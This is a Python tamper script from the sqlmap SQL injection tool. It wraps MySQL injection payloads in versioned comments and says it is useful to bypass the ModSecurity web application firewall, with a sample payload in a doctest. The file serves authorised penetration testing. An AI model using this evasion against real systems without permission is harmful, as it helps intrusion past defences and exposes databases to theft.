1#!/usr/bin/env python 2 3""" 4Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) 5See the file 'LICENSE' for copying permission 6""" 7 8import os 9 10from lib.core.common import randomInt 11from lib.core.common import singleTimeWarnMessage 12from lib.core.enums import DBMS 13from lib.core.enums import PRIORITY 14 15__priority__ = PRIORITY.HIGHER 16 17def dependencies(): 18 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) 19 20def tamper(payload, **kwargs): 21 """ 22 Embraces complete query with (MySQL) versioned comment 23 24 Requirement: 25 * MySQL 26 27 Tested against: 28 * MySQL 5.0 29 30 Notes: 31 * Useful to bypass ModSecurity WAF 32 33 >>> import random 34 >>> random.seed(0) 35 >>> tamper('1 AND 2>1--') 36 '1 /*!30963AND 2>1*/--' 37 """ 38 39 retVal = payload 40 41 if payload: 42 postfix = '' 43 for comment in ('#', '--', '/*'): 44 if comment in payload: 45 postfix = payload[payload.find(comment):] 46 payload = payload[:payload.find(comment)] 47 break 48 if ' ' in payload: 49 retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) 50 51 return retVal 52